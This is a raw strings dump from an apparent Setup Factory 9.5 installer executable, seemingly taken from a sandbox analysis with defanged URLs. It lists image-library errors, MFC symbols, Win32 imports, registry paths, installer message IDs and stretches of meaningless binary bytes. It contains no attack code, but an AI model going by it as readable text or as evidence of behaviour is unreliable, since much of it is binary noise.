Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
Found bad IPTC data resource (len exceeds block end). ID=%d
ExifInteroperabilityOffset
InteroperabilityVersion
InteroperabilityIndex
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
%s: wrong data type %d for "%s"; tag ignored
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
deflate 1.2.3 Copyright 1995-2003 Jean-loup Gailly
%ld%c
%s compression support is not configured
inflate 1.2.3 Copyright 1995-2005 Mark Adler
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
?PixarLog compression can't handle bits depth/data format combination (depth: %d)
%d bit input not supported in PixarLog
PixarLogDecode: unsupported bits/sample: %d
%s: stride %d is not a multiple of sample count, %d, data truncated.
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
PixarLog compression can't handle %d bit linear encodings
A%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
%s: No space for Group 3/4 reference line
@ Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
WindowsForms
NTDLL.DLL
COMCTL32.DLL
USER32.DLL
MSCTF.DLL
GDI32.DLL
SHLWAPI.DLL
UXTHEME.DLL
API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0.DLL
LEFTPRESSED
ALWAYSSHOWSIZINGBAR
MSGBOXFONT
%[^,], %ld, %s
User32.dll
msimg32.dll
windows-1254
windows-874
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese (Brazil)
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
Portuguese (Portugal)
windows-1255
windows-1257
windows-1253
windows-1252
windows-1250
windows-1256
windows-1251
1.2.40
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
WININET.dll
?#%X.y
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
.?AVCCmdTarget@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCISImageEx@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDVCRect@@AAV3@@@
.?AVCMainWindowSettings@@
.?AVCMD5@@
.?AVCPasswordData@@
.?AVCRTSessionVarMgr@@
.?AVCScreenCrtrMeasure@@
.?AVCWebBrowser2@@
.PAVCInternetException@@
.PAVCResourceException@@
.?AVCScreenCtrlMsg@@
.?AVCScreenCtrlMsgDetail@@
.PAVCThreadException@IR@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.PAVCOleDispatchException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegEnumKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegDeleteKeyA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteExA
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
MapVirtualKeyExA
GetKeyboardState
GetKeyboardLayout
MapVirtualKeyA
GetKeyNameTextA
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetKeyState
ExitWindowsEx
EnumWindows
MsgWaitForMultipleObjects
GetAsyncKeyState
|5#" " " 
# # #""%"$
^)1-"*"<.
2;%SK
%.Fh3>$]R
]<%XZ
WEBI
]>2?>2/"
H%FZW
|@@@@8>-
\ ,%X
[9<;.MK31?MM&
!3-%#;3&1
##0#3131%& 
.QICN,1#-#5<## @I3>##Jl;>C3I=I6lIC6&-4-350T-3]
$&%f#F>#
:0@033*00
$,0($,$4
(,,4,4,$
0488<<<( 0
.text
`.rdata
@.data
.rsrc
@.reloc
%xERRj3cqZQ
! !!####0
;;;9551%%0
! !!565665@
version="9.5.0.0"
name="setup.exe"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<!-- Windows Vista Support -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 Support -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 Support -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 Support -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 Support -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
gdiplus.dll
imagehlp.dll
IMM32.dll
MSIMG32.dll
NETAPI32.dll
OLEACC.dll
OLEAUT32.dll
oledlg.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WINMM.dll
WINSPOOL.DRV
accKeyboardShortcut
hhctrl.ocx
VWININET.DLL
dwmapi.dll
xUxTheme.dll
yDWrite.dll
D2D1.dll
SHELL32.DLL
ZRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
aero.msstyles
winxp.royale.cjstyles
royale.msstyles
winxp.luna.cjstyles
luna.msstyles
Argument %d must be of type %s.
%d arguments required.
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
9.5.0.0
2015 Indigo Rose Corporation (VVV.indigorose.com)
suf_rt.exe

irsetup.exe_432_rwx_00401000_003DD000:

t%SSSS
9=@%u
SSSSh
t%SWV
u)SSh
u)SShd
TSShX
@ SSh
u%SSSV
SSShT
SSSh`
9^$u&SSSSh?
9^$u SSSSh?
9^$u)SSSSh?
|SShF
t2SSh
Ht.Ht S
FLSSh
NLhD%u
GLSSh
GXSSh
FpSSh
FtSSh
G`SSh
.WWWW
Nt.Nt
t'SShl
u$SShe
@ SSHPWj
tFHt:Ht.Ht"Hu`
tWSShW
tl9_ tgSSh
tAHt.HHt
j%XtL9E
<SShG
FtPW
SSh@B
FTCP
u.Ph,
.FG;}
FTPQ
FTPh
V SShW
O SSh
O SSh,
kernel32.dll
%s (%s:%d)
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
MSG_ERROR
%s %d. %s
MSG_ASK_FOR_DISK
MSG_NEW_LOCATION
MSG_CONFIRM_ABORT
MSG_CONFIRM
A%s%s%s.%d
%s.%d
%s, Line %d: %s
File condition evaluation for file "%s"
msi.dll
\msi.dll
Software\Microsoft\Windows\CurrentVersion\Installer
C:\temp\SUF_SFX_TEST\
MSG_INITIALIZING
16670749
_IgnoreInvalidCertificate
SetEntriesInAcl Error %u
SetNamedSecurityInfo Error %u
*.gif
*.tif
*.tga
*.png
*.pcx
*.jpg
*.bmp
[%d]: %s
*** LOCATION: %s
__NOREPORT__
in function <%s:%d>
in function '%s'
Line: %d
%d: [%s]
Script: %s, %s (%s)
__ir_eval_value = %s;
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin2.inl
%Copyright%. All rights reserved. %CompanyURL%
WindowStyle
MainWindowSettings
%s at offset %d unterminated
Incorrect %s at offset %d
Element '%s' at offset %d not ended
End tag '%s' at offset %d does not match start tag '%s' at offset %d
No start tag for end tag '%s' at offset %d
%s%d bytes
%s%d wide chars to %d bytes
%d bytes to %s%d wide chars
MSG_SEARCH_FILE
(*.*)|*.*||
MSG_SEARCH_ALL
MSG_SEARCH_MASK
MSG_INSERTDISK
MSG_CANCEL
MSG_OK
MSG_BROWSE
MSG_PATH
Windows Server 10
Windows 10
Windows Server 2012 R2
Windows 8.1
Windows Server 2012
Windows 8
Windows Server 2008 R2
Windows 7
Windows Server 2008
Windows Vista
Windows Server 2003
Windows XP
CPasswordData
-- Defined in _SUF70_Global_Functions.lua
number e_ErrorCode, string e_ErrorMsgID
%TempFolder%\%ProductName% Setup Log.txt
%StartupFolder%
%StartFolder%
%StartProgramsFolder%
ÞsktopFolder%
%s\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%CommonFilesFolder%\Microsoft Shared\DAO
Software\Microsoft\Shared Tools\DAO350.dll
Software\Microsoft\Shared Tools\DAO360.dll
ÚOPath%
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
%SourceFolder%
%SystemDrive%
_WindowsFolder
%WindowsFolder%
%SystemFolder%
%CommonFilesFolder%
%CommonFilesFolder64%
%CommonProgramW6432%
%CommonDocumentsFolder%
%StartupFolderCommon%
%StartProgramsFolderCommon%
%StartFolderCommon%
%FontsFolder%
ÞsktopFolderCommon%
;?;?.lua
UninstallSupportFiles
CPRegKey
Run extra uninstall script: %d
Original: %d
Calculated: %d
Unable to open archive file: %d
lua5.1.dll
%SourceDrive%
%SourceFilename%
\irsetup.dat
{D387204B-8FB9-6A21-15FA-0CD14BF40EA9}
Support file added to uninstall list:
Registry key added to uninstall list:
Removed! %d
IDispatch error #%d
Error 0xx: %s
Register font: %s, %s
%sbk%d
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
Remove uninstall support file:
MSG_NO
MSG_YES_TOALL
MSG_YES
MSG_UNINSTALL_OK_REMOVE
MSG_UNINSTALL_NO_APP_USE
MSG_UNINSTALL_REMOVE_SHARED
Decrement shared file count: %s (New count = %d)
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
: %s (#%d)
Global include script: %s
RegisterTypeLib: %s
RegisterTypeLib failure reason: %s
RegisterTypeLib: %s - %s
Register COM file: %s
Register COM failure reason: %s
Register COM file: %s - System Error # %u
Register COM file on reboot: %s
regsvr32.exe /s %s
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Increment usage count: %s
Increment usage count: %s (New count = %d)
%s\%s
%s (%d)
\irsetup.skin
local e_Stage = %d;local e_CurrentItemText=[==[%s]==];local e_CurrentItemPct=%d;local e_StagePct=%d;
MSG_SYSREQ_WARN
MSG_NOTICE
MSG_SYSREQ_ABORT
%s: %s
MSG_SYSREQ_USERPERMISSION
MSG_SYSREQ_SYSTEMADMIN
MSG_SYSREQ_COLORDEPTH
MSG_BITSPERPIXEL
MSG_SYSREQ_SCREENHEIGHT
%s: %d
MSG_SYSREQ_SCREENWIDTH
%s: %d %s
MSG_SYSREQ_RAM
MSG_SIZE_MEGABYTES
Operating System
MSG_SYSREQ_OS
MSG_OS_PART_ORNEWER
MSG_OS_PART_NOSERVPACK
MSG_OS_PART_SERVPACK
MSG_OS_PART_SE
MSG_OS_PART_C
MSG_OS_PART_B
MSG_OS_PART_A
MSG_OS_ALL
MSG_OS_NONE
MSG_OS_WSRV10
MSG_OS_W10
MSG_OS_WSRV2012_R2
MSG_OS_W8_1
MSG_OS_WSRV2012
MSG_OS_W8
MSG_OS_WSRV2008_R2
MSG_OS_W7
MSG_OS_WSRV2008
MSG_OS_WVISTA
MSG_OS_WSRV2003
MSG_OS_WXP
MSG_OS_UNKNOWN
MSG_SYSREQ_NOTMET
%s %d %s
MSG_EXP_USESLEFT
MSG_EXP_USESLEFT2
%s %I64d %s
MSG_EXP_DAYSLEFT
MSG_EXP_DAYSLEFT2
Software\Microsoft\Windows\CurrentVersion\I652R9823\
MSG_EXP_CONTACT_START
Run project event: %s
local e_ErrorCode=%d; local e_ErrorMsgID = "%s"
Start project event: %s
MSG_UNINSTALLFILE_NOREMOVE
MSG_UNINSTALLFILE_INUSE
%s (%s: %u)
\WININIT.INI
MSG_FILE_EXISTS_INUSE
MSG_FILE_EXISTS_RETRY
MSG_FILE_EXISTS_ANY
MSG_FILE_EXISTS_NEWER
MSG_FILE_OVERWRITE_CONFIRM
%s\%s.lnk
%s (Return code: %d)
Product: %s, version %s
MSG_SEEKING
%s (%d):
Arc: %s
FN: %s
%s (#%d)
MSG_SKIPPING
MSG_INSTALLING
MSG_PROG_UNINSTALL_CREATECONTROLFILE
ERR_CREATEUNINSTALL_OPEN_EXE_READ
ERR_CREATEUNINSTALL_OPEN_EXE_WRITE
Overwrite uninstall executable:
Existing uninstall executable is newer. Will not overwrite.
Compared uninstall file versions. New: %s Old: %s Result: %d
Uninstall executable already exists: %s
MSG_PROG_UNINSTALL_CREATEEXE
@MSG_PROG_UNINSTALL_CREATEDATFILE
MSG_PROG_UNINSTALL_CREATEFOLDER
"/U:%s"
MSG_PROG_UNINSTALL_CREATESC
Create uninstall CP entry key
ERR_CREATEUNINSTALL_CREATEREGKEY
"%s",%d
Uninstall CP entry: URLUpdateInfo =
URLUpdateInfo
Uninstall CP entry: URLInfoAbout =
URLInfoAbout
"%s" "/U:%s"
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
MSG_PROG_UNINSTALL_CREATECPENTRY
MSG_PROG_UNINSTALL_COPYSUPPORTFILES
MSG_PROG_UNINSTALL_COPYPLUGINS
%s %s
MSG_REQUIRED_DRIVE
MSG_AVAILABLE_DRIVE
Dependency Detection Passed
MSG_PROG_CHECKING_DRIVESPACE
MSG_PROG_CHECKING_FILES
%A, %B %d, %Y
[%s] %s
%m/%d/%Y %H:%M:%S
MsgFile
ERR_MSI_PATCH_REMOVAL_UNSUPPORTED
ERR_MSI_PATCH_PACKAGE_UNSUPPORTED
ERR_MSI_INSTALL_PLATFORM_UNSUPPORTED
ERR_MSI_UNSUPPORTED_TYPE
ERR_MSI_INSTALL_LANGUAGE_UNSUPPORTED
ERR_SERVER_FILE_DOWNLOAD_SET_PROXY_PASSWORD
ERR_SERVER_FILE_DOWNLOAD_OPEN_FTP_FILE
ERR_SERVER_FILE_DOWNLOAD_OPEN_HTTP_FILE
ERR_ODBC_INVALID_KEYWORD_VALUE
ERR_WEB_503
ERR_WEB_500
ERR_WEB_404
ERR_WEB_403
ERR_WEB_400
ERR_WEB_SET_PROXY_PASSWORD
ERR_WEB_SET_PROXY_USERNAME
ERR_WEB_WRITE_MEMORY
ERR_WEB_FTP_FILE_OPEN
ERR_WEB_USER_ABORT
ERR_WEB_FILE_WRITE
ERR_WEB_DOWNLOAD_FILE_ERROR
ERR_WEB_INVALID_HTTP_RESPONSE
ERR_WEB_DESTINATION_FILE_OPEN
ERR_WEB_SEND_REQUEST
ERR_WEB_OPEN_REQUEST
ERR_WEB_CREATE_HTTP_CONNECTION
ERR_WEB_CREATE_INTERNET_SESSION
ERR_REG_GET_SUB_KEY_NAME
ERR_REG_NON_EXISTANT_SUB_KEY
ERR_REG_DELETE_KEY
ERR_REG_CREATE_KEY
ERR_FILE_EXECUTION_FAILED_ELEVATION
ERR_KEY_RUN_ON_REBOOT_FAILED
ERR_USER_ABORTED_OPERATION
ERR_NON_EXISTANT_VIEWER_EXE
ERR_FILE_EXECUTION_FAILED
ERR_SPECIFIED_EXE_FILE_INVALID
MSG_SUCCESS
Language set: Primary = %d, Secondary = %d
%CompanyURL%
%CompanyName%
UxTheme.dll
%Copyright% %CompanyName%. All rights reserved. %CompanyURL%
%TempFolder%\%ProductName% Uninstall Log.txt
%CompanyName% Support Department
%AppFolder%\uninstall.exe
uninstall.xml
CWebBrowser2
Confirm Operation
KERNEL32.DLL
PSAPI.DLL
Kernel32.dll
WS2_32.DLL
Copying "%s"
"%s" %s
%d.%d.%d.%d
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\PrivateBuild
Sfc.dll
.bak%d
Windows ME
Windows 98
Windows 95
Windows 2000
Windows NT 4
Windows NT 3
%s\shell\open\command
NUL=%s
Software\Microsoft\Windows NT\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Fonts
***!!!***@@
Advapi32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s\%s.url
%s\%s.pif
srclient.dll
%s_%d
%s\_ir_tmpfnt_%d
/\:*?"<>|
%%x
d:d
WinINet.dll
Could not create Internet session: %u
Error downloading file: %u
Error writing the destination file: %d-%u
Could not create HTTP connection: %u
Could not create HTTP connection
Incorrect HTTP status returned by server: %d
Send request failed: %u
Content-Type: application/x-www-form-urlencoded
Could not open HTTP file: %s
PTF://
hXXps://
hXXp://
%s; DIRECT
jsproxy.dll
DetectAutoProxyUrl
wininet.dll
Could not HTTP file: %u
MSG_STATUS_HANDLE_CREATED
MSG_STATUS_HANDLE_CLOSING
MSG_STATUS_REQUEST_COMPLETE
MSG_REDIRECTING
MSG_CONNECTION_CLOSED
MSG_RESOLVING_HOST_NAME
MSG_HOST_NAME_RESOLVED
MSG_CONNECTING_TO_SERVER
MSG_CONNECTED_TO_SERVER
MSG_CLOSING_CONNECTION
MSG: %d
TRACE: LastError = %d ("%s")
Script: %s, %s
Script: %s, Line %d
All Files (*.*)|*.*|
PasswordInput
MSG_MOVING
MSG_COPYING
MSG_FROM
MSG_TO
MSG_DELETING
MSG_SEARCHING
\StringFileInfo\xx\SpecialBuild
\StringFileInfo\xx\OriginalFilename
\StringFileInfo\xx\Comments
\StringFileInfo\xx\LegalTrademarks
\StringFileInfo\xx\LegalCopyright
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\InternalName
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\CompanyName
ErrorMsg
%Y-%m-%dT%H:%M:%S
MSG_INSTALL_DO_YOU_WANT_OVERWRITE
MSG_INSTALL_ALWAYS_ASK_OVERWRITE_MSG
MSG_INSTALL_FILE_OLDER_MSG
OpenURL
\msiexec.exe
RunMsiexec
SQLInstallerError
SQLRemoveDriverManager
odbccp32.dll
SQLConfigDataSource
SQLInstallDriverEx
SQLInstallDriverManager
SQLRemoveDriver
\Kernel32.dll
GetKeyNames
DoesKeyExist
DeleteKey
CreateKey
ShortcutKey
keycode
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
MSG_SIZE_BYTES
P?MSG_SIZE_KILOBYTES
>MSG_SIZE_GIGABYTES
xxxxxx
%s-%s-%s
%s/%s/%s
%s:%s:%s
%d:%s:%s AM
%d:%s:%s PM
MSG_REBOOT_FAILED
WININET.DLL
PPassword
Password
%s %s %s %s (%0.2f %s)
%0.1f %s/%0.1f %s
%I64u %s/%I64u %s
MSG_KB_PER_SEC
MSG_ESTIMATED_TIME_LEFT
MSG_SAVING
MSG_DOWNLOADING
%s %s %s %s
MSG_QUERYING_INTERNET
MSG_READING
GetHTTPErrorInfo
%s > %s
number e_CtrlID, number e_MsgID, table e_Details
Removed: %s
local e_CtrlID=%d; local e_MsgID=%d;
Button%d
Check%d
ComboBox%d
Edit%d
Space available on selected drive: %SpaceAvailable%
Space required: %SpaceRequired%
Error: The specified file: '%s' could not be found.
Error: The specified file: '%s' could not be opened.
Error: The specified file: '%s' is too large to read.
Error: The specified file: '%s' could not be read.
Application.Exit();
Screen.Next();
Screen.Back();
Radio%d
Total space required: %SpaceRequired%
IDS_CTRL_CHECK_BOX_d
IDS_CTRL_BUTTON_d
IDS_CTRL_STATICTEXT_LABEL_d
IDS_CTRL_COMBOBOX_d_DEFAULT
IDS_CTRL_EDIT_d
IDS_CTRL_RADIO_BUTTON_d
IDS_CTRL_LISTBOX_d
IDS_CTRL_SCROLLTEXT_BODY_d
IDS_CTRL_PROGRESS_BAR_d
IDS_CTRL_GROUP_BOX_d
IDS_CTRL_SELECT_PACKAGE_TREE_d
IDS_CTRL_BILLBOARD_d
CTRL_CHECK_BOX_d
CTRL_BUTTON_d
CTRL_STATICTEXT_LABEL_d
CTRL_COMBOBOX_d
CTRL_EDIT_d
CTRL_RADIO_BUTTON_d
CTRL_LIST_BOX_d
CTRL_SCROLLTEXT_BODY_d
CTRL_PROGRESS_BAR_d
CTRL_GROUP_BOX_d
CTRL_SELECT_PACKAGE_TREE_d
CTRL_BILLBOARD_d
IDS_CTRL_COMBOBOX_d_ITEMS
IDS_CTRL_SCROLLTEXT_FILE_d
WebWindow
IDS_CTRL_CATEGORY_NAME_d_%.3d
IDS_CTRL_CATEGORY_DESCRIPTION_d_%.3d
hXXp://VVV.indigorose.com/route.php?pid=suf9buy
[email protected]
.tiff
.jpeg
.wbmp
CNotSupportedException
user32.dll
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
CHttpConnection
CHttpFile
HTTP/1.0
msctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
mfcm100.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Shell32.dll
%s:%x:%x:%x:%x
RegDeleteKeyExA
lXXxXXXXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
ole32.dll
MFCLink_UrlPrefix
MFCLink_Url
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
&%d %s
Hex={X,X,X}
ShowCmd
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sPane-%d%x
%sPane-%d
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%c%d%c%s
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
windows
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
